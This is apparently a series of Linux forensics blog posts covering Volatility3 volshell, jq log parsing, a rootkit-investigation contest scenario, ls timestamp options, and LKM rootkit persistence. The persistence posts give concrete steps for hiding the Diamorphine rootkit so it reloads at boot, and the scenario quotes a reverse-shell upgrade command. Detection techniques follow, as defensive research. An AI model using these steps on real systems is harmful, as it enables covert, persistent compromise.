4026531840 1 lo 00:00:00:00:00:00 False 127.0.0.1 8 host UNKNOWN
4026531840 1 lo 00:00:00:00:00:00 False ::1 128 host UNKNOWN
4026531840 2 enp0s3 08:00:27:3a:05:32 False 192.168.4.22 22 global UP
4026531840 2 enp0s3 08:00:27:3a:05:32 False fdb0:fa27:86c5:1:19cf:7bad:b8a6:c5d7 64 global UP
4026531840 2 enp0s3 08:00:27:3a:05:32 False fdb0:fa27:86c5:1:a00:27ff:fe3a:532 64 global UP
4026531840 2 enp0s3 08:00:27:3a:05:32 False fe80::a00:27ff:fe3a:532 64 link UP
4026532287 1 lo 00:00:00:00:00:00 False 127.0.0.1 8 host UNKNOWN
4026532287 1 lo 00:00:00:00:00:00 False ::1 128 host UNKNOWN
4026532345 1 lo 00:00:00:00:00:00 False 127.0.0.1 8 host UNKNOWN
4026532345 1 lo 00:00:00:00:00:00 False ::1 128 host UNKNOWN
4026532403 1 lo 00:00:00:00:00:00 False 127.0.0.1 8 host UNKNOWN
4026532403 1 lo 00:00:00:00:00:00 False ::1 128 host UNKNOWN
(layer_name) >>>

First we need to import the Volatility class that contains the plugin we want to invoke. The basic syntax here is “from volatility3.plugins.<os> import <class>“. “<os>” will be “windows“, “mac“, or “linux“. Since we’re running a Linux plugin, “<class>” will be the word that appears after “linux.” in the plugin name. For example, if were trying to run “linux.elfs.Elfs“, then “<class>” is “elfs“.

We use the dpo() method to actually run the plugin and get the output. If we were invoking the plugin on the command line, we would specify “linux.ip.Addr” as the plugin name. But here in Linux volshell, we can leave off the “linux.“. After the plugin name always specify “kernel = self.config['kernel']” to satisfy the dpo() method’s syntax.

If you want to run another plugin, just repeat the pattern. Import the appropriate Volatility class and run dpo() as before:

(layer_name) >>> from volatility3.plugins.linux import pstree
(layer_name) >>> dpo(pstree.PsTree, kernel = self.config['kernel'])

OFFSET (V) PID TID PPID COMM

0x8c7cc0281980 1 1 0 systemd
* 0x8c7cc0d79980 310 310 1 systemd-journal
* 0x8c7cc8268000 357 357 1 systemd-timesyn
* 0x8c7cc81a6600 365 365 1 systemd-udevd
* 0x8c7cc67e0000 687 687 1 avahi-daemon
** 0x8c7cc9986600 718 718 687 avahi-daemon
...

What’s great about this approach is that the memory image was already parsed when volshell started up. So each plugin runs very quickly.

Changing Output Modes

In many cases, it’s better for my workflow to get the plugin output in JSON format rather than the standard text output. I’d be embarrassed to admit how long the following little recipe took me to figure out, so let’s just get to the code:

(layer_name) >>> from volatility3.cli import text_renderer
(layer_name) >>> from volatility3.plugins.linux import psaux
(layer_name) >>> treegrid = gt(psaux.PsAux, kernel = self.config['kernel'])
(layer_name) >>> treegrid.populate()
(layer_name) >>> rt(treegrid,text_renderer.JsonLinesRenderer())

{"ARGS": "/sbin/init", "COMM": "systemd", "PID": 1, "PPID": 0, "__children": []}
{"ARGS": "[kthreadd]", "COMM": "kthreadd", "PID": 2, "PPID": 0, "__children": []}
{"ARGS": "[pool_workqueue_]", "COMM": "pool_workqueue_", "PID": 3, "PPID": 2, "__children": []}
{"ARGS": "[kworker/R-kvfre]", "COMM": "kworker/R-kvfre", "PID": 4, "PPID": 2, "__children": []}
{"ARGS": "[kworker/R-rcu_g]", "COMM": "kworker/R-rcu_g", "PID": 5, "PPID": 2, "__children": []}
...

First we’re importing the text_renderer class from volatility3.cli. This class contains methods for outputting various text formats, like JsonLinesRenderer() for single-line JSON format. Other options include JsonRenderer() for “pretty-printed” JSON output, or CSVRenderer() for comma-separated values formatting.

Next we import the class for Volatility plugin we want to invoke, just as before. But rather than calling dpo(), we create a new treegrid object with generate_treegrid() (abbreviated “gt()“). The arguments to gt() are the same as those for dpo().

gt() merely creates the treegrid object. We still have to call the treegrid.populate() method to load data into the object. Once we have populated the treegrid with data, we can invoke render_treegrid() (“rt()“) to output the data with our chosen text renderer.

Stumbling Towards Automation

Clearly this approach requires a lot of redundant typing. Automating the task of running multiple plugins through volshell is clearly the next step. My ptt.sh script has an initial attempt at this. At some point, I’d like to turn this idea into a standalone script outside of ptt.sh.

jq For Forensics

jq is a tremendously useful tool for dealing with JSON data. But the documentation that exists seems to be targeted at developers parsing deeply nested JSON structures to transform them into other JSON structures. In my DFIR role, I typically deal with streams of fairly simple JSON records–usually some sort of log– that I need to transform into structured text, such as comma-separated (CSV) or tab-separated (TSV) output. I’ve spent a lot of time running through reference manuals and endless Stack Overflow postings to get to a reasonable level with jq. I wanted to share some of the things I’ve learned along the way.

Start With The Basics

At it’s simplest, jq is an excellent JSON pretty printer:

$ jq . journal.json
{
"_MACHINE_ID": "0f2f13b9dce0451591ae0dc418f6c96f",
"_RUNTIME_SCOPE": "system",
"_HOSTNAME": "vbox",
"_SOURCE_BOOTTIME_TIMESTAMP": "0",
"MESSAGE": "Linux version 6.12.74+deb13+1-amd64 (debian-kernel@lists.debian.org) (x86_64-linux-gnu-gcc-14 (Debian 14.2.0-19) 14.2.0, GNU ld (GNU Binutils for Debian) 2.44) #1 SMP PREEMPT_DYNAMIC Debian 6.12.74-2 (2026-03-08)",
"__MONOTONIC_TIMESTAMP": "6400064",
"_SOURCE_MONOTONIC_TIMESTAMP": "0",
"_BOOT_ID": "2a5a598d4f6142c7b7719eed38c1a2b9",
"SYSLOG_IDENTIFIER": "kernel",
"_TRANSPORT": "kernel",
"PRIORITY": "5",
"SYSLOG_FACILITY": "0",
"__CURSOR": "s=0a047604dca842218e0807bc796d4cb7;i=1;b=2a5a598d4f6142c7b7719eed
38c1a2b9;m=61a840;t=64dc728142e95;x=852824913ddff90e",
"__REALTIME_TIMESTAMP": "1774367626505877"
}
{
"_MACHINE_ID": "0f2f13b9dce0451591ae0dc418f6c96f",
"MESSAGE": "Command line: BOOT_IMAGE=/boot/vmlinuz-6.12.74+deb13+1-amd64 root=UUID=d6cf7c18-1df5-4f29-a6f8-d5c4947c1df7 ro quiet",

...

The basic syntax here is “jq <script> <jsonfile> ...“, where <script> is some sort of translation script in jq‘s own particular scripting language. The script “.” is essentially a null transformation that simply tells jq to output whatever it sees in its input <jsonfile>. The default output style for jq is the pretty-printed style you see above.

Some of you will recognize the data above as Systemd journal entries. Normally we would work with the Systemd journal via the journalctl command. But exported journal data from one of my lab systems is a good example set for showing you some useful jq tips and tricks that you can apply to any sort of exported logging stream.

Other Output Modes

Suppose we just wanted to output the “MESSAGE” field from each record. Just specify the field you want to output with a leading “.“:

$ jq .MESSAGE journal.json
"Linux version 6.12.74+deb13+1-amd64 (debian-kernel@lists.debian.org) (x86_64-linux-gnu-gcc-14 (Debian 14.2.0-19) 14.2.0, GNU ld (GNU Binutils for Debian) 2.44) #1 SMP PREEMPT_DYNAMIC Debian 6.12.74-2 (2026-03-08)"
"Command line: BOOT_IMAGE=/boot/vmlinuz-6.12.74+deb13+1-amd64 root=UUID=d6cf7c18-1df5-4f29-a6f8-d5c4947c1df7 ro quiet"
...

Because the value of the MESSAGE field is a string, jq outputs each message surrounded by double quotes. If you don’t want the quoting, use the “-r” option for raw mode output:

$ jq -r .MESSAGE journal.json
Linux version 6.12.74+deb13+1-amd64 (debian-kernel@lists.debian.org) (x86_64-linux-gnu-gcc-14 (Debian 14.2.0-19) 14.2.0, GNU ld (GNU Binutils for Debian) 2.44) #1 SMP PREEMPT_DYNAMIC Debian 6.12.74-2 (2026-03-08)
Command line: BOOT_IMAGE=/boot/vmlinuz-6.12.74+deb13+1-amd64 root=UUID=d6cf7c18-1df5-4f29-a6f8-d5c4947c1df7 ro quiet
...

Suppose we wanted to output multiple fields as columns of structured text. jq includes support for both “@csv” and “@tsv” output modes:

$ jq -r '[.__REALTIME_TIMESTAMP, ._HOSTNAME, .MESSAGE] | @csv' journal.json
"1774367626505877","vbox","Linux version 6.12.74+deb13+1-amd64 (debian-kernel@lists.debian.org) (x86_64-linux-gnu-gcc-14 (Debian 14.2.0-19) 14.2.0, GNU ld (GNU Binutils for Debian) 2.44) #1 SMP PREEMPT_DYNAMIC Debian 6.12.74-2 (2026-03-08)"
"1774367626505925","vbox","Command line: BOOT_IMAGE=/boot/vmlinuz-6.12.74+deb13+1-amd64 root=UUID=d6cf7c18-1df5-4f29-a6f8-d5c4947c1df7 ro quiet"
...

jq transformation scripts use a pipelining syntax. Here we’re sending the fields we want to output into the “@csv” formatting tool. “@csv” wants its inputs as a JSON array, so we create an array on the fly simply by enclosing the fields we want to output with square brackets (“[..., ..., ...]“). The “@csv” output method automatically quotes each field and handles escaping any double quotes that might be included.

If you want other delimiters besides the traditional commas or tabs, jq can also output arbitrary text:

$ jq -r '"\(.__REALTIME_TIMESTAMP)|\(._HOSTNAME)|\(.MESSAGE)"' journal.json
1774367626505877|vbox|Linux version 6.12.74+deb13+1-amd64 (debian-kernel@lists.debian.org) (x86_64-linux-gnu-gcc-14 (Debian 14.2.0-19) 14.2.0, GNU ld (GNU Binutils for Debian) 2.44) #1 SMP PREEMPT_DYNAMIC Debian 6.12.74-2 (2026-03-08)
1774367626505925|vbox|Command line: BOOT_IMAGE=/boot/vmlinuz-6.12.74+deb13+1-amd64 root=UUID=d6cf7c18-1df5-4f29-a6f8-d5c4947c1df7 ro quiet
...

Use double quotes ("...") to enclose your output template. Use “\(.fieldname)” to output the value of specific fields. Anything else in your template is output as literal text. Here I’m outputting pipe-delimited text with the same three fields as in our CSV example above.

Note that our output template can use the typical escape sequences like “\t” for tabs. So another way to produce tab-delimited text would be:

$ jq -r '"\(.__REALTIME_TIMESTAMP)\t\(._HOSTNAME)\t\(.MESSAGE)"' journal.json
1774367626505877 vbox Linux version 6.12.74+deb13+1-amd64 (debian-kernel@lists.debian.org) (x86_64-linux-gnu-gcc-14 (Debian 14.2.0-19) 14.2.0, GNU ld (GNU Binutils for Debian) 2.44) #1 SMP PREEMPT_DYNAMIC Debian 6.12.74-2 (2026-03-08)
1774367626505925 vbox Command line: BOOT_IMAGE=/boot/vmlinuz-6.12.74+deb13+1-amd64 root=UUID=d6cf7c18-1df5-4f29-a6f8-d5c4947c1df7 ro quiet
...

However, it’s almost certainly easier to use '[..., ..., ...] | @tsv' for this.

Transforming Data With Builtin Operators

jq includes a wide variety of builtin operators for data transformation and math. For example, suppose we wanted to format those __REALTIME_TIMESTAMP fields in the Systemd journal into human-readable strings:

$ head -1 journal.json | jq -r '(.__REALTIME_TIMESTAMP | tonumber) / 1000000 | strftime("%F %T")'
2026-03-24 15:53:46

There’s a lot going on here, so let’s break it down a bit at a time. __REALTIME_TIMESTAMP is a string– if you look at the pretty-printed output above, the values are displayed in double quotes meaning they are string type values. Ultimately we want to feed the __REALTIME_TIMESTAMP value into strftime() to produce formatted text, but strftime() wants numeric input. The first thing to do then is to convert the string into a number with “tonumber“. The jq piping syntax is how we express this transformation.

Our next problem is that __REALTIME_TIMESTAMP is in microseconds, but strftime() wants good old Unix epoch seconds. So we do some math with the traditional “/” operator for division. This actually converts our value into a decimal number (“1774367626.505877“), but that’s good enough for strftime(). Finally we pipeline the number we calculated into the strftime() function. We give strftime() an appropriate format string to get the output we want.

This works great, but we’re throwing away the microseconds information. What if we wanted to display that as part of the timestamp? Time to introduce some more useful string operations:

$ head -1 journal.json | jq -r '((.__REALTIME_TIMESTAMP | tonumber) / 1000000 | strftime("%F %T.")) + 
(.__REALTIME_TIMESTAMP | .[-6:])'

2026-03-24 15:53:46.505877

Looking at the back part of our expression on the second line above, we are using jq‘s slicing operation “.[start:end]“. Since we are using a negative offset for the start value, we are counting backwards from the end of the string six characters. With no end value specified, it outputs the rest of the string from that point.

Like many other scripting languages, jq supports string concatenation with the addition operator (“+“). Here we are adding the formatted string output from strftime() and the microseconds value we sliced out of the string. Note the the strftime() format has been updated to output a literal “.” between the formatted text and the microseconds.

Suppose we wanted to include the human-readable timestamp we just created instead of the raw epoch microseconds for our “@csv” output. The trick is to take our jq code for producing human readable timestamps and drop it into our “[...] | @csv” pipeline in place of the __REALTIME_TIMESTAMP field:

$ jq -r '[((.__REALTIME_TIMESTAMP | tonumber) / 1000000 | strftime("%F %T.")) + (.__REALTIME_TIMESTAMP | .[-6:]), ._HOSTNAME, .MESSAGE] | @csv' journal.json
"2026-03-24 15:53:46.505877","vbox","Linux version 6.12.74+deb13+1-amd64 (debian-kernel@lists.debian.org) (x86_64-linux-gnu-gcc-14 (Debian 14.2.0-19) 14.2.0, GNU ld (GNU Binutils for Debian) 2.44) #1 SMP PREEMPT_DYNAMIC Debian 6.12.74-2 (2026-03-08)"
"2026-03-24 15:53:46.505925","vbox","Command line: BOOT_IMAGE=/boot/vmlinuz-6.12.74+deb13+1-amd64 root=UUID=d6cf7c18-1df5-4f29-a6f8-d5c4947c1df7 ro quiet"
...

Scripting With jq

Obviously that jq expression is pretty horrible to type on the command line. You can always take any jq script and put it into a text file and then run that script on your data with the “-f” option:

$ jq -r -f csv-journal.jq journal.json
"2026-03-24 15:53:46.505877","vbox","Linux version 6.12.74+deb13+1-amd64 (debian-kernel@lists.debian.org) (x86_64-linux-gnu-gcc-14 (Debian 14.2.0-19) 14.2.0, GNU ld (GNU Binutils for Debian) 2.44) #1 SMP PREEMPT_DYNAMIC Debian 6.12.74-2 (2026-03-08)"
"2026-03-24 15:53:46.505925","vbox","Command line: BOOT_IMAGE=/boot/vmlinuz-6.12.74+deb13+1-amd64 root=UUID=d6cf7c18-1df5-4f29-a6f8-d5c4947c1df7 ro quiet"
...

In this instance, our csv-journal.jq file is the jq recipe from our command line example, but without the single quotes. Since jq doesn’t care about whitespace in scripts, we can format our recipe with newlines and indentation to make it more readable:

$ cat csv-journal.jq 
[((.__REALTIME_TIMESTAMP | tonumber) / 1000000 | strftime("%F %T.")) +
(.__REALTIME_TIMESTAMP | .[-6:]),
._HOSTNAME, .MESSAGE] | @csv

On Linux systems you can even use jq in a “bang path” at the top of the script so it automatically gets invoked as the interpreter:

$ cat csv-journal.jq
#!/usr/bin/jq -rf

[((.__REALTIME_TIMESTAMP | tonumber) / 1000000 | strftime("%F %T.")) +
(.__REALTIME_TIMESTAMP | .[-6:]),
._HOSTNAME, .MESSAGE] | @csv

Note that the new interpreter path at the top of the script includes the “-rf” options for raw output (“-r“) and interpreting the rest of the file as a script (“-f“).

Once we have the interpreter path at the top of the script, we can just cat our JSON data into the script without invoking jq directly:

$ chmod +x csv-journal.jq 
$ cat journal.json | ./csv-journal.jq
"2026-03-24 15:53:46.505877","vbox","Linux version 6.12.74+deb13+1-amd64 (debian-kernel@lists.debian.org) (x86_64-linux-gnu-gcc-14 (Debian 14.2.0-19) 14.2.0, GNU ld (GNU Binutils for Debian) 2.44) #1 SMP PREEMPT_DYNAMIC Debian 6.12.74-2 (2026-03-08)"
"2026-03-24 15:53:46.505925","vbox","Command line: BOOT_IMAGE=/boot/vmlinuz-6.12.74+deb13+1-amd64 root=UUID=d6cf7c18-1df5-4f29-a6f8-d5c4947c1df7 ro quiet"
...

This might make things easier for less-technical users.

Selecting Records

When working with streams of records, it’s typical to want to only operate on certain records. For example, suppose we only wanted to see log messages from the “sudo” command. In the Systemd journal, these messages have the “SYSLOG_IDENTIFIER” field set to “sudo“:

$ jq -r 'select(.SYSLOG_IDENTIFIER == "sudo") | .MESSAGE' journal.json
worker : user NOT in sudoers ; TTY=pts/0 ; PWD=/home/worker ; USER=root ; COMMAND=/bin/bash
worker : TTY=pts/2 ; PWD=/home/worker ; USER=root ; COMMAND=/bin/bash
pam_unix(sudo:session): session opened for user root(uid=0) by worker(uid=1000)
pam_unix(sudo:session): session closed for user root
worker : TTY=pts/0 ; PWD=/home/worker ; USER=root ; COMMAND=/bin/bash
pam_unix(sudo:session): session opened for user root(uid=0) by worker(uid=1000)
pam_unix(sudo:session): session closed for user root
worker : TTY=pts/1 ; PWD=/home/worker ; USER=root ; COMMAND=/bin/bash
pam_unix(sudo:session): session opened for user root(uid=0) by worker(uid=1000)
worker : TTY=pts/3 ; PWD=/home/worker ; USER=root ; COMMAND=/bin/bash
...

The new magic is jq‘s select() operator up at the front of that pipeline. If the conditional you give to select() evaluates to true, then the record you have matched gets passed down for processing by the rest of the pipeline. If not, then that record is skipped.

Logical operators (“and“, “or“, “not“) and parentheses are allowed. And you can do pattern matching with PCRE-like expressions. For example, the really interesting lines in Sudo logs are the ones that show the command being invoked (“COMMAND=“):

$ jq -r 'select(.SYSLOG_IDENTIFIER == "sudo" and (.MESSAGE | test("COMMAND="))) | .MESSAGE' journal.json
worker : user NOT in sudoers ; TTY=pts/0 ; PWD=/home/worker ; USER=root ; COMMAND=/bin/bash
worker : TTY=pts/2 ; PWD=/home/worker ; USER=root ; COMMAND=/bin/bash
worker : TTY=pts/0 ; PWD=/home/worker ; USER=root ; COMMAND=/bin/bash
worker : TTY=pts/1 ; PWD=/home/worker ; USER=root ; COMMAND=/bin/bash
worker : TTY=pts/3 ; PWD=/home/worker ; USER=root ; COMMAND=/bin/bash
...

For pattern matching, just pipeline the field you want to match against into the test() operator. Here I’m matching the literal string “COMMAND=” against the MESSAGE field. The pattern match is joined with our original selector for “sudo” in the SYSLOG_IDENTIFIER field using a logical “and“.

Here’s another example showing a useful regex when dealing with SSH logs, just to give you a flavor of things you can do with regular expression matching:

$ jq -r 'select(._COMM == "sshd" and 
(.MESSAGE | test("^((Accepted|Failed) .* for|Invalid user) "))) | .MESSAGE' journal.json

Invalid user mary from 192.168.10.31 port 55746
Failed password for invalid user mary from 192.168.10.31 port 55746 ssh2
Accepted password for hal from 192.168.4.22 port 42310 ssh2
...

Enough For Now

Hopefully this is enough to get you started writing your own basic jq scripts. As with many things, the rest you pick up as you practice and get frustrated. The jq reference manual is useful for checking the syntax of different built-in operators, but I often find the examples more frustrating than helpful. Searching Stack Overflow can often yield more useful results.

Feel free to drop your questions into the comments, or reach out to me via social media or email. Maybe your questions will turn this single blog article into a series!

Linux Forensic Scenario

Let’s try something a little different for today’s blog post!

I’ve been working on ideas for a major update on my Linux forensics class, including new lab scenarios. I recently threw together a rough draft of one of my scenario ideas: built a machine, planted some malware on it, and then used UAC to capture forensic data from the system. I was pleased with the results, and thought I would share them with the larger community.

And then I thought, why not turn it into a bit of a contest? For the moment I haven’t decided on any prizes other than bragging rights, but you never know. I have decided that the deadline for submissions for judging will be April 15th– tax day here in the USA.

The Scenario

You received an escalation from your SOC. They received an alert from their NMS about suspicious traffic to one of the Linux workers in the development group’s CI/CD pipeline. The alert was for unencrypted traffic on port 22/tcp, specifically the string “python3 -c 'import pty; pty.spawn("/bin/bash")'” which triggered the alert for “reverse shell promotion” in the NMS. They note that the system is showing signs of heavy CPU usage but that they don’t see any process(es) that account for this. Following their SOP, they acquired data from the system using UAC and have escalated to you as on-call for the internal IR/Threat team.

Other information about the system:

  • There is a single shared account on the system called “worker“. It has full Sudo privileges with the NOPASSWD option set.
  • All network access to the box is through a jump host at IP 192.168.4.35.
  • The UAC collection is uac-vbox-linux-20260324234043.tar.gz

Additional Comments

I threw this scenario together in a matter of hours, so when you look at the timeline of the system you will see that it got built and then compromised very quickly. For the final scenario I will doubtless do a more complete job running fake workloads for some time before the “attack” actually happens.

Similarly, you’ll probably discover that there is no significant network infrastructure around the compromised system. The “jump host” is really just another host in my lab environment that I was operating from.

But I still think there’s plenty of interesting artifacts to find in this scenario. I’m leaving things deliberately open-ended because I want to see what people come up with. But the goal would be to at least account for the issues raised by the SOC: why is there unencrypted traffic on 22/tcp, why is the system burning CPU, and why can’t the SOC see what is going on? Is the system compromised? When and how did that happen?

Submissions

Submissions for judging must be received no later than 23:59 UTC on 2026-04-15. I will accept submissions in .docx, PDF, or text. You may email your submissions to hrpomeranz@gmail.com. Please try to put something like “Linux Forensic Scenario Submission” in the Subject: line to make my life easier.

Depending on the number of submissions I get, I may need more folks to help with the judging. If you’re not planning to compete but would like to help judge, please drop me a line at the email address above. I’ll let you know if I need the help once I count the number (and length) of the submissions.

Happy forensicating! Have fun!

Linux Notes: ls and Timestamps

There’s an old riddle in Unix circles: “Name a letter that is not an option for the ls command”. The advent of the GNU version of ls has only made this more difficult to answer. Even if you’re a Unix/Linux power user, you’ve probably only memorized a small handful of the available options.

For example, I have “ls -lArt” burned into my brain from my Sys Admin days. “-l” for detailed listing, “-A” to show hidden files and directories (but not the “.” and “..” links like “-a“), sort by last modified time with “-t“, and “-r” to reverse the sort so the newest files appear right above your next shell prompt.

$ ls -lArt
total 1288
-rw-r--r-- 1 root root 9 Aug 7 2006 host.conf
-rw-r--r-- 1 root root 433 Aug 23 2020 apg.conf
-rw-r--r-- 1 root root 26 Dec 20 2020 libao.conf
-rw-r--r-- 1 root root 12813 Mar 27 2021 services
-rw-r--r-- 1 root root 769 Apr 10 2021 profile
-rw-r--r-- 1 root root 449 Nov 29 2021 mailcap.order
-rw-r--r-- 1 root root 119 Jan 10 2022 catdocrc
...
-rw-r--r-- 1 root root 52536 Feb 23 11:44 mailcap
-rw-r--r-- 1 root root 108979 Mar 2 09:24 ld.so.cache
-rw-r--r-- 1 root root 75 Mar 3 18:08 resolv.conf
drwxr-xr-x 5 root lp 4096 Mar 5 19:52 cups

You’ll note that the timestamps are displayed in two different formats. The oldest files show “month day year”, while the newer files show “month day hh:mm”. The default for ls is that files more than six months old display year information.

Personally I prefer consistent ISO-style timestamps with “--time-style=long-iso“:

$ ls -lArt --time-style=long-iso
total 1288
-rw-r--r-- 1 root root 9 2006-08-07 13:14 host.conf
-rw-r--r-- 1 root root 433 2020-08-23 10:52 apg.conf
-rw-r--r-- 1 root root 26 2020-12-20 11:21 libao.conf
-rw-r--r-- 1 root root 12813 2021-03-27 18:32 services
-rw-r--r-- 1 root root 769 2021-04-10 16:00 profile
-rw-r--r-- 1 root root 449 2021-11-29 08:07 mailcap.order
-rw-r--r-- 1 root root 119 2022-01-10 19:08 catdocrc
...
-rw-r--r-- 1 root root 52536 2026-02-23 11:44 mailcap
-rw-r--r-- 1 root root 108979 2026-03-02 09:24 ld.so.cache
-rw-r--r-- 1 root root 75 2026-03-03 18:08 resolv.conf
drwxr-xr-x 5 root lp 4096 2026-03-05 19:52 cups

While “-t” sorts on last modified time by default, other options allow you to sort and display other timestamps. For example, “-u” sorts on and displays last access time. “-u” is hardly memorable as last access time, but remember “-a” is used for something else.

It’s a pain trying to remember the one letter options for the other timestamps– and note there isn’t even a short option for sorting/displaying on file creation time. So I just use “--time=” to pick the timestamp I want:

$ ls -lArt --time=birth --time-style=long-iso
total 1288
-rw-r--r-- 1 root root 1013 2025-04-10 10:27 fstab
drwxr-xr-x 2 root root 4096 2025-04-10 10:27 ImageMagick-6
drwxr-xr-x 2 root root 4096 2025-04-10 10:27 GNUstep
...
-rw-r--r-- 1 root root 142 2026-02-23 11:41 shells
-rw-r--r-- 1 root root 52536 2026-02-23 11:44 mailcap
-rw-r--r-- 1 root root 108979 2026-03-02 09:24 ld.so.cache
-rw-r--r-- 1 root root 75 2026-03-03 18:08 resolv.conf

Here we’re sorting on and displaying file creation times (“--time=birth“). You can use “--time=atime” or “--time=ctime” for the other timestamps.

If this command line seems long and unwieldy, remember that you can create aliases for commands in your .bashrc or other startup files:

alias ls='ls --color=auto --time-style=long-iso'
alias lb='ls -lArt --time=birth'

With normal ls commands, I’ll get colored output always, and “long-iso” dates whenever I use “-l“. I can use lb whenever I want file creation times. Note that alias definitions “stack”– the “lb” alias will get the color and time-style options from my basic “ls” alias, so I don’t need to include the “--time-style” option in the “lb” alias.

A Little More on LKM Persistence

In my previous blog post I demonstrated a method for persisting a Linux LKM rootkit across reboots by leveraging systemd-modules-load. For this method to work, we needed to add the evil module into the /usr/lib/modules/$(uname -r) directory and then run depmod. As I pointed out in the article, while the LKM could hide the module object itself, the modprobe command invoked by systemd-modules-load requires the module name to be listed in the modules.dep and modules.dep.bin files created by depmod.

But a few days later it occurred to me that the module name actually only has to appear in the modules.dep.bin file in order to be loaded. modules.dep is an intermediate file that modules.dep.bin is built from. The modprobe command invoked by systemd-modules-load only looks at the (trie structured) modules.dep.bin file. So once modules.dep.bin is created, the attacker could go back and remove their evil module name from modules.dep.

I tested this on my lab system, installing the LKM per my previous blog post and then editing the evil module name out of modules.dep. When I rebooted my lab system, I verfied that the evil module was loaded by looking for the files that are hidden by the rootkit:

# ls /usr/lib/modules-load.d/
fwupd-msr.conf open-vm-tools-desktop.conf
# ls /usr/lib/modules/$(uname -r)/kernel/drivers/block
aoe drbd loop.ko nbd.ko pktcdvd.ko rsxx sx8.ko virtio_blk.ko xen-blkfront.ko
brd.ko floppy.ko mtip32xx null_blk.ko rbd.ko skd.ko umem.ko xen-blkback zram

If the rootkit was not operating, we’d see the zaq123edcx* file in each of these directories.

I thought about writing some code to unpack the format of modules.dep.bin. This format is well documented in the comments of the source code for depmod.c. But then I realized that there was a much easier way to find the evil module name hiding in modules.dep.bin.

depmod works by walking the directory structure under /usr/lib/modules/$(uname -r) and creating modules.dep based on what it finds there. If we run depmod while the LKM is active, then depmod will not see the evil kernel object and will build a new modules.dep and modules.dep.bin file without the LKM object listed:

# cd /usr/lib/modules/$(uname -r)
# cp modules.dep modules.dep.orig
# cp modules.dep.bin modules.dep.bin.orig
# depmod
# diff modules.dep modules.dep.orig
# diff modules.dep.bin modules.dep.bin.orig
Binary files modules.dep.bin and modules.dep.bin.orig differ

The old and new modules.dep files are the same, since I had previously removed the evil module name by hand. But the *.bin* files differ because the evil module name is still lurking in modules.dep.bin.orig.

And I don’t need to write code to dump the contents of modules.dep.bin.orig— I’ll just use strings and diff:

# diff <(strings -a modules.dep.bin.orig) <(strings -a modules.dep.bin)
1c1
< ?=4_cs
---
> 4_cs
5610,5611d5609
< 123edcx_diamorphine
< <kernel/drivers/block/zaq123edcx-diamorphine.ko:
5616c5614
< 4ndemod
---
> demod
5619c5617
< enhua
---
> 5jenhua
5622a5621
> 7@53
5627d5625
< 8Z2c
5630c5628
< a2326
---
> 9Ja2326
5635c5633
< alloc
---
> <valloc

The output would be prettier with some custom tooling, but you can clearly see the name of the hidden object in the diff output.

From an investigative perspective, I really wish depmod had an option to write modules.dep.bin to an alternate directory. That would make it easier to perform these steps without modifying the state of the system under investigation. I suppose we could use overlayfs hacks to make this happen.

But honestly using modprobe to load your LKM rootkit is probably not the best approach. insmod allows you to specify the path to your evil module. Create a script that uses insmod to load the rootkit, and then drop the script into /etc/cron.hourly with a file name that will be hidden once the rootkit is loaded. Easy!

Linux LKM Persistence

Back in August, Ruben Groenewoud posted two detailed articles on Linux persistence mechanisms and then followed that up with a testing/simulation tool called PANIX that implements many of these persistence mechanisms. Ruben’s work was, in turn, influenced by a series of articles by Pepe Berba and work by Eder Ignacio. Eder’s February article on persistence with udev rules seems particularly prescient after Stroz/AON reported in August on a long-running campaign using udev rules for persistence. I highly recommend all of this work, and frankly I’m including these links so I personally have an easy place to go find them whenever I need them.

In general, all of this work focuses on using persistence mechanisms for running programs in user space. For example, PANIX sets up a simple reverse shell by default (though the actual payload can be customized) and the “sedexp” campaign described by Stroz/AON used udev rules to trigger a custom malware executable.

Reading all of this material got my evil mind working, and got me thinking about how I might handle persistence if I was working with a Linux loadable kernel module (LKM) type rootkit. Certainly I could use any of the user space persistence mechanisms in PANIX that run with root privilege (or at least have CAP_SYS_MODULE capability) to call modprobe or insmod to load my evil kernel module. But what about other Linux mechanisms for specifically loading kernel modules at boot time?

Hiks Gerganov has written a useful article summarizing how to load Linux modules at boot time. If you want to be traditional, you can always put the name of the module you want to load into /etc/modules. But that seems a little too obvious, so instead we are going to use the more flexible systemd-modules-load service to get our evil kernel module installed.

systemd-modules-load looks in multiple directories for configuration files specifying modules to load, including /etc/modules-load.d, /usr/lib/modules-load.d, and /usr/local/lib/modules-load.d. systemd-modules-load also looks in /run/modules-load.d, but /run is typically a tmpfs style file system that does not persist across reboots. Configuration file names must end with “.conf” and simply contain the names of the modules to load, one name per line.

For my examples, I’m going to use the Diamorphine LKM rootkit. Diamorphine started out as a proof of concept rootkit, but a Diamorphine variant has recently been found in the wild. Diamorphine allows you to choose a “magic string” at compile time– any file or directory name that starts with the magic string will automatically be hidden by the rootkit once the rootkit is loaded into the kernel. In my examples I am using the magic string “zaq123edcx“.

First we need to copy the Diamorphine kernel module, typically compiled as diamorphine.ko, into a directory under /usr/lib/modules where it can be found by the modprobe command invoked by systemd-modules-load:

# cp diamorphine.ko /usr/lib/modules/$(uname -r)/kernel/drivers/block/zaq123edcx-diamorphine.ko
# depmod

Note that the directory under /usr/lib/modules is kernel version specific. You can put your evil module anywhere under /usr/lib/modules/*/kernel that you like. Notice that by using the magic string in the file name, we are relying on the rootkit itself to hide the module. Of course, if the victim machine receives a kernel update then your Diamorphine module in the older kernel directory will no longer be loaded and your evil plots could end up being exposed.

The depmod step is necessary to update the /usr/lib/modules/*/modules.dep and /usr/lib/modules/*/modules.dep.bin files. Until these files are updated, modprobe will be unable to locate your kernel module. Unfortunately, depmod puts the path name of your evil module into both of the modules.dep* files. So you will probably want to choose a less obvious name (and magic string) than the one I am using here.

The only other step needed is to create a configuration file for systemd-modules-load:

# echo zaq123edcx-diamorphine >/usr/lib/modules-load.d/zaq123edcx-evil.conf

The configuration file is just a single line– whatever name you copied the evil module to under /usr/lib/modules, but without the “.ko” extension. Here again we name the configuration file with the Diamorphine magic string so the file will be hidden once the rootkit is loaded.

That’s all the configuration you need to do. Load the rootkit manually by running “modprobe zaq123edcx-diamorphine” and rest easy in the knowledge that the rootkit will load automatically whenever the system reboots.

Finding the Evil

What artifacts are created by these changes? The mtime on the /usr/lib/modules-load.d directory and the directory where you installed the rootkit module will be updated. Aside from putting the name of your evil module into the modules.dep* files, the depmod command updates the mtime on several other files under /usr/lib/modules/*:

/usr/lib/modules/.../modules.alias
/usr/lib/modules/.../modules.alias.bin
/usr/lib/modules/.../modules.builtin.alias.bin
/usr/lib/modules/.../modules.builtin.bin
/usr/lib/modules/.../modules.dep
/usr/lib/modules/.../modules.dep.bin
